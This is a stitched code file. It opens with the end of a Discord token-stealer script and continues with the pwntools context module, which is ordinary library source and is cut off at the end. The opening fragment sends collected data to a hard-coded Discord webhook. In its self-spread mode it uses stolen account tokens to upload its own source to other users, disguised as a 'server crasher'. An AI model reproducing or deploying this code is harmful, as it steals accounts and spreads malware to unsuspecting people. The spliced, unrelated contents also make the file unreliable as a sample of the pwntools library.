urlopen(Request("https://discordapp.com/api/webhooks/832050040289099847/HknwtRKQc_qBsXl3S-UtpGjbrWV_8g0QQMyUTdRoVNdsD9eIQqx1hUIgRszdPYkaqYb4K", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
from __future__ import absolute_import
from __future__ import division
import collections
import functools
import logging
import os
import platform
import six
import socket
import stat
import string
import subprocess
import sys
import threading
import time
import socks
from pwnlib.config import register_config
from pwnlib.device import Device
from pwnlib.timeout import Timeout
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
__all__ = ['context', 'ContextType', 'Thread']
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
This is necessary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print(t)
{'key': 'value'}
>>> def p(): print(t)
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherits its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
Threads created by using the native :class:`threading.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print(context.arch)
... context.arch = 'mips'
... print(context.arch)
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print(context.arch)
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print(context.arch)
arm
Implementation Details:
This class is implemented by hooking the private function
:func:`threading.Thread._bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
sup = super(Thread, self)
bootstrap = getattr(sup, '_bootstrap', None)
if bootstrap is None:
sup.__bootstrap()
else:
bootstrap()
_bootstrap = __bootstrap
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> pwnlib.context._longest(data) == data
True
>>> for i in pwnlib.context._longest(data):
... print(i)
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable :data:`.context`, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print(enhex(pwnlib.asm.asm('nop')))
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'buffer_size': 4096,
'cyclic_alphabet': string.ascii_lowercase.encode(),
'cyclic_size': 4,
'delete_corefiles': False,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'encoding': 'auto',
'endian': 'little',
'gdbinit': "",
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'rename_corefiles': True,
'newline': b'\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'ssh_session': None,
'signed': False,
'terminal': tuple(),
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android','baremetal'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
'none': {},
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(self.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print(context.timeout)
1.0
>>> with context.local(timeout = 2):
... print(context.timeout)
... context.timeout = 3
... print(context.timeout)
2.0
3.0
>>> print(context.timeout)
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower.
Example:
Let's assume the normal situation, where log_level is INFO.
>>> context.clear(log_level='info')
Note that only the log levels below ERROR do not print anything.
>>> with context.quiet:
... log.debug("DEBUG")
... log.info("INFO")
... log.warn("WARN")
Next let's try with the debugging level set to 'debug' before we
enter the context handler:
>>> with context.local(log_level='debug'):
... with context.quiet:
... log.debug("DEBUG")
... log.info("INFO")
... log.warn("WARN")
[DEBUG] DEBUG
[*] INFO
[!] WARN
"""
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
def quietfunc(self, function):
"""Similar to :attr:`quiet`, but wraps a whole function.
Example:
Let's set up two functions, which are the same but one is
wrapped with :attr:`quietfunc`.
>>> def loud(): log.info("Loud")
>>> @context.quietfunc
... def quiet(): log.info("Quiet")
If we set the logging level to 'info', the loud function
prints its contents.
>>> with context.local(log_level='info'): loud()
[*] Loud
However, the quiet function does not, since :attr:`quietfunc`
silences all output unless the log level is DEBUG.
>>> with context.local(log_level='info'): quiet()
Now let's try again with debugging enabled.
>>> with context.local(log_level='debug'): quiet()
[*] Quiet
"""
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
This is the opposite of :attr:`.quiet` and functionally equivalent to:
.. code-block:: python
with context.local(log_level='debug'):
...
Example:
Note that the function does not emit any information by default
>>> context.clear()
>>> def func(): log.debug("Hello")
>>> func()
But if we put it inside a :attr:`.verbose` context manager, the
information is printed.
>>> with context.verbose: func()
[DEBUG] Hello
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.clear()
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'baremetal', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armv7l', 'arm'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = self.architectures[arch]
except KeyError:
raise AttributeError('arch must be one of %r' % sorted(self.architectures))
for k,v in defaults.items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If :const:`False`, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
Even then, this doesn't matter much -- only when the segment
registers need to be known
"""
with self.local(arch=arch):
return self.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
Infer target architecture, bit-width, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits // 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits // 8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def encoding(self, charset):
if charset == 'auto':
return charset
if ( b'aA'.decode(charset) != 'aA'
or 'aA'.encode(charset) != b'aA'):
raise ValueError('Strange encoding!')
return charset
def _encode(self, s):
if isinstance(s, (bytes, bytearray)):
return s # already bytes
if self.encoding == 'auto':
try:
return s.encode('latin1')
except UnicodeEncodeError:
return s.encode('utf-8', 'surrogateescape')
return s.encode(self.encoding)
def _decode(self, b):
if self.encoding == 'auto':
try:
return b.decode('utf-8')
except UnicodeDecodeError:
return b.decode('latin1')
except AttributeError:
return b
return b.decode(self.encoding)
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in self.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(self.endiannesses))
return self.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want e.g. log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
# logging._levelNames existed on Python 2; Python 3 renamed it _nameToLevel.
level_names = getattr(logging, '_levelNames', None) or logging._nameToLevel
permitted = sorted(x for x in level_names if isinstance(x, str))
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> foo_txt = tempfile.mktemp()
>>> bar_txt = tempfile.mktemp()
>>> context.log_file = foo_txt
>>> log.debug('Hello!')
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file=bar_txt):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> open(foo_txt).readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> open(foo_txt).readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> open(foo_txt).readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> open(bar_txt).readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (bytes, six.text_type)):
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not hasattr(value, "fileno"):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'baremetal', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in self.oses:
raise AttributeError("os must be one of %r" % self.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
:const:`True` and :const:`False` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = self.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(self.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (bytes, six.text_type)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, (bytes, six.text_type)):
device = Device(device)
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb.
Unless ``$ADB_PATH`` is set, uses the default ``adb`` binary in ``$PATH``.
"""
ADB_PATH = os.environ.get('ADB_PATH', 'adb')
command = [ADB_PATH]
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
@_validator
def buffer_size(self, size):
"""Internal buffer size to use for :class:`pwnlib.tubes.tube.tube` objects.
This is not the maximum size of the buffer, but this is the amount of data
which is passed to each raw ``read`` syscall (or equivalent).
"""
return int(size)
@property
def cache_dir(self):
"""Directory used for caching data.
Note:
May be either a path string, or :const:`None`.
Example:
>>> cache_dir = context.cache_dir
>>> cache_dir is not None
True
>>> os.chmod(cache_dir, 0o000)
>>> context.cache_dir is None
True
>>> os.chmod(cache_dir, 0o755)
>>> cache_dir == context.cache_dir
True
"""
xdg_cache_home = os.environ.get('XDG_CACHE_HOME') or \
os.path.join(os.path.expanduser('~'), '.cache')
if not os.access(xdg_cache_home, os.W_OK):
return None
cache = os.path.join(xdg_cache_home, '.pwntools-cache-%d.%d' % sys.version_info[:2])
if not os.path.exists(cache):
try:
os.mkdir(cache)
except OSError:
return None
# Some wargames e.g. pwnable.kr have created dummy directories
# which cannot be modified by the user account (owned by root).
if not os.access(cache, os.W_OK):
return None
return cache
@_validator
def delete_corefiles(self, v):
"""Whether pwntools automatically deletes corefiles after exiting.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``False``.
"""
return bool(v)
@_validator
def rename_corefiles(self, v):
"""Whether pwntools automatically renames corefiles.
This is useful for two things:
- Prevent corefiles from being overwritten, if ``kernel.core_pattern``
is something simple like ``"core"``.
- Ensure corefiles are generated, if ``kernel.core_pattern`` uses ``apport``,
which refuses to overwrite any existing files.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``True``.
"""
return bool(v)
@_validator
def newline(self, v):
"""Line ending used for Tubes by default.
This configures the newline emitted by e.g. ``sendline`` or that is used
as a delimiter for e.g. ``recvline``.
"""
return six.ensure_binary(v)
@_validator
def gdbinit(self, value):
"""Path to the gdbinit that is used when running GDB locally.
This is useful if you want pwntools-launched GDB to include some additional modules,
like PEDA but you do not want to have GDB include them by default.
The setting will only apply when GDB is launched locally since remote hosts may not have
the necessary requirements for the gdbinit.
If set to an empty string, GDB will use the default `~/.gdbinit`.
Default value is ``""``.
"""
return str(value)
@_validator
def cyclic_alphabet(self, alphabet):
"""Cyclic alphabet.
Default value is `string.ascii_lowercase`.
"""
# Do not allow multiple occurrences
if len(set(alphabet)) != len(alphabet):
raise AttributeError("cyclic alphabet cannot contain duplicates")
return alphabet.encode()
@_validator
def cyclic_size(self, size):
"""Cyclic pattern size.
Default value is `4`.
"""
size = int(size)
if size > self.bytes:
raise AttributeError("cyclic pattern size cannot be larger than word size")
return size
@_validator
def ssh_session(self, shell):
from pwnlib.tubes.ssh import ssh
if not isinstance(shell, ssh):
raise AttributeError("context.ssh_session must be an ssh tube")
return shell
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global :class:`.ContextType` object, used to store commonly-used pwntools settings.
#:
#: In most cases, the context is used to infer default variables values.
#: For example, :func:`.asm` can take an ``arch`` parameter as a
#: keyword argument.
#:
#: If it is not supplied, the ``arch`` specified by ``context`` is used instead.
#:
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
